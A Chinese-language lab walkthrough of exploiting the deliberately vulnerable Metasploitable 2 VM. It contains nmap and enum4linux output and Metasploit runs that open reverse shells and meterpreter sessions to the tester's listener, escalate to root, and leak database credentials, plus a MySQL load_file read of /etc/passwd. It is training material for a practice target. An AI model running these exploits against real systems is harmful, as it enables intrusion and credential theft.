# 环境配置
下载下来之后网 VM 里一放,默认开了桥接模式,直接用
账号 / 密码:msfadmin/msfadmin
登录进去 ifconfig 看一眼 IP: 192.168.74.128
准备开干
# 服务识别
C:\WINDOWS\system32>nmap 192.168.74.128 -sS -T4 -p-
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:22 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
3632/tcp open distccd
5432/tcp open postgresql
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 6.81 seconds
看到开了 80 端口,瞄一眼,啥也没有。
开了 80 肯定尝试从 80 先去手工看看,当练手了。其实如果是正常情况我可能就直接上综合扫描了
dirsearch 扫一下路径瞅瞅
D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch>dirsearch -u http://192.168.74.128
dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: D:\PentestTool\Pentest_ToolBox\Gather_Infomation\dirsearch\reports\http_192.168.74.128\_24-04-01_20-13-18.txt
Target: http://192.168.74.128/
[20:13:18] Starting:
[20:13:23] 403 - 332B - /.ht_wsr.txt
[20:13:24] 403 - 335B - /.htaccess.bak1
[20:13:24] 403 - 335B - /.htaccess.orig
[20:13:24] 403 - 335B - /.htaccess.save
[20:13:24] 403 - 337B - /.htaccess.sample
[20:13:24] 403 - 336B - /.htaccess_extra
[20:13:24] 403 - 333B - /.htaccessBAK
[20:13:24] 403 - 335B - /.htaccess_orig
[20:13:24] 403 - 334B - /.htaccessOLD2
[20:13:24] 403 - 333B - /.htaccess_sc
[20:13:24] 403 - 333B - /.htaccessOLD
[20:13:24] 403 - 325B - /.htm
[20:13:24] 403 - 331B - /.htpasswds
[20:13:24] 403 - 335B - /.htpasswd_test
[20:13:24] 403 - 332B - /.httr-oauth
[20:13:24] 403 - 326B - /.html
[20:14:12] 403 - 329B - /cgi-bin/
[20:14:26] 403 - 325B - /doc/
[20:14:26] 403 - 329B - /doc/api/
[20:14:27] 403 - 340B - /doc/en/changes.html
[20:14:27] 403 - 340B - /doc/html/index.html
[20:14:27] 403 - 339B - /doc/stable.version
[20:15:16] 200 - 48KB - /phpinfo
[20:15:16] 200 - 48KB - /phpinfo.php
[20:15:37] 403 - 334B - /server-status
[20:15:37] 403 - 335B - /server-status/
[20:15:59] 301 - 357B - /tikiwiki -> http://192.168.74.128/tikiwiki/
看到有一个 phpinfo,还有一个新的页面,叫 tikiwiki
# 漏洞利用
# tikiwiki RCE
由于这个是 metasploit 的靶场,看到这个 tikiwiki ,我特么直接搜索对应的 exp
msf6 > search tikiwiki
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution
1 exploit/unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability
2 exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution
3 auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal No TikiWiki Information Disclosure
4 exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution
5 exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution
Interact with a module by name or index. For example info 5, use 5 or use exploit/unix/webapp/tikiwiki_graph_formula_exec
看到了 4 个 RCE,一个文件上传,一个信息披露,待会挨个模块 info 瞅瞅
随便调用一个 RCE 看看
5 个针对 tikiwiki 的模块全部失败,有的是不支持 payload, fomula 这个讲道理应该可以,但是不知道为什么不行,可能是我的虚拟机配置有问题?不应该啊,等会复盘
查了些资料,作者在其他的相关问题下面曾留言说,可能是由于漏洞的坏字符和编码器的问题,编码器没有办法在保证预期功能的情况下完美解决坏字符问题,所以建议尝试其他的 payload。但是在其他人的文章中发现,是成功利用了这个漏洞的,可能是我用是 metasploit 的 V6 最新版本,他们可能调整了编码器,所以导致有些老模块没有做相应的适配导致这个问题。(我猜的
# samba
不过他还开了 139 和 445 端口,看一眼具体的版本信息
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 445
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 15:32 中国标准时间
Nmap scan report for 192.168.209.68
Host is up (0.00088s latency).
PORT STATE SERVICE VERSION
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
看到了版本信息,如果 samba 服务具体版本信息在 3.0.20 至 3.0.25rc3 的话可以使用 CVE-2007-2447 进行工具
用 samba 的模块搞一下
msf6 exploit(unix/webapp/tikiwiki_graph_formula_exec) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 192.168.2.225:4444
[*] Command shell session 2 opened (192.168.2.225:4444 -> 192.168.74.128:59869) at 2024-04-01 20:58:55 +0800
id
uid=0(root) gid=0(root)
成功拿到了 root 权限
# tikiwiki 数据库泄露
之前利用的漏洞因为版本问题无法利用。我懒得下 V4 版本的 msf,所以尝试其他模块进行
尝试了 db 泄露的模块
msf6 auxiliary(admin/tikiwiki/tikidblib) > run
[*] Running module against 192.168.209.68
[*] Establishing a connection to the target...
[*] Get information about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password : root
[*] Auxiliary module execution completed
看到了数据库的账号和密码,直接连接进去,可以查看系统文件
mysql -h 192.168.1.105 -u root -p
root
show databases;
use mysql
show tables;
select User, Password, from user;
select load_file('/etc/passwd');
# postgresql 利用
看到开放了 5432 端口,查一下版本信息
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 5432
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 16:30 中国标准时间
Nmap scan report for bogon (192.168.74.128)
Host is up (0.00013s latency).
PORT STATE SERVICE VERSION
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.37 seconds
查询一下 metasploit 中的利用模块
msf6 > search name:postgresql version:8
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
1 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
2 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
3 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
4 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
5 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
6 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
7 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
8 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
9 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
Interact with a module by name or index. For example info 9, use 9 or use exploit/windows/postgres/postgres_payload
第八个可以直接 getshell,开冲
msf6 exploit(linux/postgres/postgres_payload) > use 8
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
# 配置省略
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] 192.168.74.128:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/ViEXhZas.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 2 opened (192.168.74.1:4444 -> 192.168.74.128:51664) at 2024-04-02 16:36:20 +0800
meterpreter >
拿到了 meterpreter
查询一下权限
meterpreter > getuid
Server username: postgres
发现是低权限,那么开始提权
查找资料发现这个版本的内核具有提权漏洞 Linux udev Netlink Local Privilege Escalation
进行利用
meterpreter > bg
[*] Backgrounding session 2...
msf6 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/local/udev_netlink) > set LHOST 192.168.74.1
LHOST => 192.168.74.1
msf6 exploit(linux/local/udev_netlink) > set SESSION 2
SESSION => 2
msf6 exploit(linux/local/udev_netlink) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to autodetect netlink pid...
[*] Meterpreter session, using get_processes to find netlink pid
[*] udev pid: 2994
[+] Found netlink pid: 2993
[*] Writing payload executable (207 bytes) to /tmp/cTXcvwGutp
[*] Writing exploit executable (1879 bytes) to /tmp/DaZonJcalG
[*] chmod'ing and running it...
[*] Sending stage (1017704 bytes) to 192.168.74.128
[*] Meterpreter session 3 opened (192.168.74.1:4444 -> 192.168.74.128:42669) at 2024-04-02 16:40:14 +0800
meterpreter > getuid
Server username: root
拿到了权限
# SMB 枚举和目录穿越
这个版本的 samba 还有一个漏洞 Samba Symlink Directory Traversal ,是个目录遍历
用 kali 里的 enum4linux 工具可以遍历 smb 服务中的信息,默认全部攻击,所以信息很多。包括了用户名、共享文件夹信息等等等等
┌──(root㉿kali)-[~/Desktop]
└─# enum4linux 192.168.74.128
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Apr 2 08:07:18 2024
=========================================( Target Information )=========================================
Target ........... 192.168.74.128
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
===========================( Enumerating Workgroup/Domain on 192.168.74.128 )===========================
[+] Got domain/workgroup name: WORKGROUP
===============================( Nbtstat Information for 192.168.74.128 )===============================
Looking up status of 192.168.74.128
METASPLOITABLE <00> - B <ACTIVE> Workstation Service
METASPLOITABLE <03> - B <ACTIVE> Messenger Service
METASPLOITABLE <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
==================================( Session Check on 192.168.74.128 )==================================
[+] Server 192.168.74.128 allows sessions using username '', password ''
===============================( Getting domain SID for 192.168.74.128 )===============================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( OS information on 192.168.74.128 )==================================
[E] Can't get OS info with smbclient
[+] Got OS info for 192.168.74.128 from srvinfo:
METASPLOITABLE Wk Sv PrQ Unx NT SNT metasploitable server (Samba 3.0.20-Debian)
platform_id : 500
os version : 4.9
server type : 0x9a03
======================================( Users on 192.168.74.128 )======================================
index: 0x1 RID: 0x3f2 acb: 0x00000011 Account: games Name: games Desc: (null)
index: 0x2 RID: 0x1f5 acb: 0x00000011 Account: nobody Name: nobody Desc: (null)
index: 0x3 RID: 0x4ba acb: 0x00000011 Account: bind Name: (null) Desc: (null)
index: 0x4 RID: 0x402 acb: 0x00000011 Account: proxy Name: proxy Desc: (null)
index: 0x5 RID: 0x4b4 acb: 0x00000011 Account: syslog Name: (null) Desc: (null)
index: 0x6 RID: 0xbba acb: 0x00000010 Account: user Name: just a user,111,, Desc: (null)
index: 0x7 RID: 0x42a acb: 0x00000011 Account: www-data Name: www-data Desc: (null)
index: 0x8 RID: 0x3e8 acb: 0x00000011 Account: root Name: root Desc: (null)
index: 0x9 RID: 0x3fa acb: 0x00000011 Account: news Name: news Desc: (null)
index: 0xa RID: 0x4c0 acb: 0x00000011 Account: postgres Name: PostgreSQL administrator,,, Desc: (null)
index: 0xb RID: 0x3ec acb: 0x00000011 Account: bin Name: bin Desc: (null)
index: 0xc RID: 0x3f8 acb: 0x00000011 Account: mail Name: mail Desc: (null)
index: 0xd RID: 0x4c6 acb: 0x00000011 Account: distccd Name: (null) Desc: (null)
index: 0xe RID: 0x4ca acb: 0x00000011 Account: proftpd Name: (null) Desc: (null)
index: 0xf RID: 0x4b2 acb: 0x00000011 Account: dhcp Name: (null) Desc: (null)
index: 0x10 RID: 0x3ea acb: 0x00000011 Account: daemon Name: daemon Desc: (null)
index: 0x11 RID: 0x4b8 acb: 0x00000011 Account: sshd Name: (null) Desc: (null)
index: 0x12 RID: 0x3f4 acb: 0x00000011 Account: man Name: man Desc: (null)
index: 0x13 RID: 0x3f6 acb: 0x00000011 Account: lp Name: lp Desc: (null)
index: 0x14 RID: 0x4c2 acb: 0x00000011 Account: mysql Name: MySQL Server,,, Desc: (null)
index: 0x15 RID: 0x43a acb: 0x00000011 Account: gnats Name: Gnats Bug-Reporting System (admin) Desc: (null)
index: 0x16 RID: 0x4b0 acb: 0x00000011 Account: libuuid Name: (null) Desc: (null)
index: 0x17 RID: 0x42c acb: 0x00000011 Account: backup Name: backup Desc: (null)
index: 0x18 RID: 0xbb8 acb: 0x00000010 Account: msfadmin Name: msfadmin,,, Desc: (null)
index: 0x19 RID: 0x4c8 acb: 0x00000011 Account: telnetd Name: (null) Desc: (null)
index: 0x1a RID: 0x3ee acb: 0x00000011 Account: sys Name: sys Desc: (null)
index: 0x1b RID: 0x4b6 acb: 0x00000011 Account: klog Name: (null) Desc: (null)
index: 0x1c RID: 0x4bc acb: 0x00000011 Account: postfix Name: (null) Desc: (null)
index: 0x1d RID: 0xbbc acb: 0x00000011 Account: service Name: ,,, Desc: (null)
index: 0x1e RID: 0x434 acb: 0x00000011 Account: list Name: Mailing List Manager Desc: (null)
index: 0x1f RID: 0x436 acb: 0x00000011 Account: irc Name: ircd Desc: (null)
index: 0x20 RID: 0x4be acb: 0x00000011 Account: ftp Name: (null) Desc: (null)
index: 0x21 RID: 0x4c4 acb: 0x00000011 Account: tomcat55 Name: (null) Desc: (null)
index: 0x22 RID: 0x3f0 acb: 0x00000011 Account: sync Name: sync Desc: (null)
index: 0x23 RID: 0x3fc acb: 0x00000011 Account: uucp Name: uucp Desc: (null)
user:[games] rid:[0x3f2]
user:[nobody] rid:[0x1f5]
user:[bind] rid:[0x4ba]
user:[proxy] rid:[0x402]
user:[syslog] rid:[0x4b4]
user:[user] rid:[0xbba]
user:[www-data] rid:[0x42a]
user:[root] rid:[0x3e8]
user:[news] rid:[0x3fa]
user:[postgres] rid:[0x4c0]
user:[bin] rid:[0x3ec]
user:[mail] rid:[0x3f8]
user:[distccd] rid:[0x4c6]
user:[proftpd] rid:[0x4ca]
user:[dhcp] rid:[0x4b2]
user:[daemon] rid:[0x3ea]
user:[sshd] rid:[0x4b8]
user:[man] rid:[0x3f4]
user:[lp] rid:[0x3f6]
user:[mysql] rid:[0x4c2]
user:[gnats] rid:[0x43a]
user:[libuuid] rid:[0x4b0]
user:[backup] rid:[0x42c]
user:[msfadmin] rid:[0xbb8]
user:[telnetd] rid:[0x4c8]
user:[sys] rid:[0x3ee]
user:[klog] rid:[0x4b6]
user:[postfix] rid:[0x4bc]
user:[service] rid:[0xbbc]
user:[list] rid:[0x434]
user:[irc] rid:[0x436]
user:[ftp] rid:[0x4be]
user:[tomcat55] rid:[0x4c4]
user:[sync] rid:[0x3f0]
user:[uucp] rid:[0x3fc]
================================( Share Enumeration on 192.168.74.128 )================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE
[+] Attempting to map shares on 192.168.74.128
//192.168.74.128/print$ Mapping: DENIED Listing: N/A Writing: N/A
//192.168.74.128/tmp Mapping: OK Listing: OK Writing: N/A
//192.168.74.128/opt Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
//192.168.74.128/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//192.168.74.128/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
===========================( Password Policy Information for 192.168.74.128 )===========================
[+] Attaching to 192.168.74.128 using a NULL share
[+] Trying protocol 139/SMB...
[+] Found domain(s):
[+] METASPLOITABLE
[+] Builtin
[+] Password Info for Domain: METASPLOITABLE
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
======================================( Groups on 192.168.74.128 )======================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=================( Users on 192.168.74.128 via RID cycling (RIDS: 500-550,1000-1050) )=================
[I] Found new SID:
S-1-5-21-1042354039-2475377354-766472396
[+] Enumerating users using SID S-1-5-21-1042354039-2475377354-766472396 and logon username '', password ''
S-1-5-21-1042354039-2475377354-766472396-500 METASPLOITABLE\Administrator (Local User)
S-1-5-21-1042354039-2475377354-766472396-501 METASPLOITABLE\nobody (Local User)
S-1-5-21-1042354039-2475377354-766472396-512 METASPLOITABLE\Domain Admins (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-513 METASPLOITABLE\Domain Users (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-514 METASPLOITABLE\Domain Guests (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1000 METASPLOITABLE\root (Local User)
S-1-5-21-1042354039-2475377354-766472396-1001 METASPLOITABLE\root (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1002 METASPLOITABLE\daemon (Local User)
S-1-5-21-1042354039-2475377354-766472396-1003 METASPLOITABLE\daemon (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1004 METASPLOITABLE\bin (Local User)
S-1-5-21-1042354039-2475377354-766472396-1005 METASPLOITABLE\bin (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1006 METASPLOITABLE\sys (Local User)
S-1-5-21-1042354039-2475377354-766472396-1007 METASPLOITABLE\sys (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1008 METASPLOITABLE\sync (Local User)
S-1-5-21-1042354039-2475377354-766472396-1009 METASPLOITABLE\adm (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1010 METASPLOITABLE\games (Local User)
S-1-5-21-1042354039-2475377354-766472396-1011 METASPLOITABLE\tty (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1012 METASPLOITABLE\man (Local User)
S-1-5-21-1042354039-2475377354-766472396-1013 METASPLOITABLE\disk (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1014 METASPLOITABLE\lp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1015 METASPLOITABLE\lp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1016 METASPLOITABLE\mail (Local User)
S-1-5-21-1042354039-2475377354-766472396-1017 METASPLOITABLE\mail (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1018 METASPLOITABLE\news (Local User)
S-1-5-21-1042354039-2475377354-766472396-1019 METASPLOITABLE\news (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1020 METASPLOITABLE\uucp (Local User)
S-1-5-21-1042354039-2475377354-766472396-1021 METASPLOITABLE\uucp (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1025 METASPLOITABLE\man (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1026 METASPLOITABLE\proxy (Local User)
S-1-5-21-1042354039-2475377354-766472396-1027 METASPLOITABLE\proxy (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1031 METASPLOITABLE\kmem (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1041 METASPLOITABLE\dialout (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1043 METASPLOITABLE\fax (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1045 METASPLOITABLE\voice (Domain Group)
S-1-5-21-1042354039-2475377354-766472396-1049 METASPLOITABLE\cdrom (Domain Group)
==============================( Getting printer info for 192.168.74.128 )==============================
No printers returned.
enum4linux complete on Tue Apr 2 08:07:28 2024
同样的 metasploit 也可以做到
msf6 > search samba_symlink
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/samba_symlink_traversal normal No Samba Symlink Directory Traversal
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/smb/samba_symlink_traversal
msf6 > use 0
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set RHOSTS 192.168.74.128
RHOSTS => 192.168.74.128
msf6 auxiliary(admin/smb/samba_symlink_traversal) > set SMBSHARE tmp
SMBSHARE => tmp
msf6 auxiliary(admin/smb/samba_symlink_traversal) > run
[*] Running module against 192.168.74.128
[*] 192.168.74.128:445 - Connecting to the server...
[*] 192.168.74.128:445 - Trying to mount writeable share 'tmp'...
[*] 192.168.74.128:445 - Trying to link 'rootfs' to the root filesystem...
[*] 192.168.74.128:445 - Now access the following share to browse the root filesystem:
[*] 192.168.74.128:445 - \\192.168.74.128\tmp\rootfs\
[*] Auxiliary module execution completed
这样就可以遍历目录了,使用 smb 连上去访问 \rootfs\ 就相当于访问根目录,可以尝试写入 ssh
# distcc 命令执行
看到了开启了 3632 的 distcc 服务,查一下具体版本信息
C:\WINDOWS\system32>nmap -p 3632 -sV 192.168.74.128
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:24 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.06 seconds
查一下攻击模块
msf6 auxiliary(admin/smb/samba_symlink_traversal) > search name:distcc
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/misc/distcc_exec
使用并利用,但是攻击失败
msf6 exploit(unix/misc/distcc_exec) > run
[*] Started reverse TCP handler on 192.168.74.1:7777
[-] 192.168.74.128:3632 - Exploit failed: Errno::ECONNRESET An existing connection was forcibly closed by the remote host.
[*] Exploit completed, but no session was created.
这个问题搜了半天,没有靠谱的答案。知道的大哥踢我
# Tomcat
8180 端口没发现是什么东西,探测一下
C:\WINDOWS\system32>nmap -sV 192.168.74.128 -p 8180
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-02 20:40 中国标准时间
Nmap scan report for 192.168.74.128
Host is up (0.00s latency).
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:BA:A0:B5 (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
老生常谈,通过破解口令,进行 war 包拿 shell。
metasploit 代劳了
msf6 exploit(multi/http/tomcat_mgr_deploy) > run
[*] Started reverse TCP handler on 192.168.74.1:4444
[*] Attempting to automatically select a target...
[*] Automatically selected target "Linux x86"
[*] Uploading 6117 bytes as g8EZVHSRE.war ...
[*] Executing /g8EZVHSRE/ZgXpG0r8NWYiewAWxe0R7H69CsMyfi.jsp...
[-] Execution failed on g8EZVHSRE [500 Internal Server Error]
[*] Undeploying g8EZVHSRE ...
[*] Exploit completed, but no session was created.
metasploit 代劳不了了,很奇怪的上传失败,看了下 tomcat 管理端,文件是传上去了,但是好像不能执行?不明白原因,同样的步骤别人是 OK 的啊?
我直接打 war 包 jsp 的马,也不行
D:\Desktop\1111>jar -cvf 222.war .\
已添加清单
正在添加: 111.jsp(输入 = 855) (输出 = 494)(压缩了 42%)
奇怪耶
# 弱口令
其他的都是些弱口令了,整个 hydra 爆破完事。
# 小结
tomcat 上传 war 包、tikiwiki 的 RCE 和 distcc 的 RCE 都失败了
tikiwiki 可能是因为 metasploit 高版本改写了编码器导致老模块不兼容
tomcat 不知道为什么
distcc 网上搜的最多的都说是 ssl 的问题,但是有这个问题的人都试过了,解决不了
有知道的大哥踢我
参考:
- https://stuffwithaurum.com/2015/06/13/metasploitable-walkthrough-an-exploitation-guide/
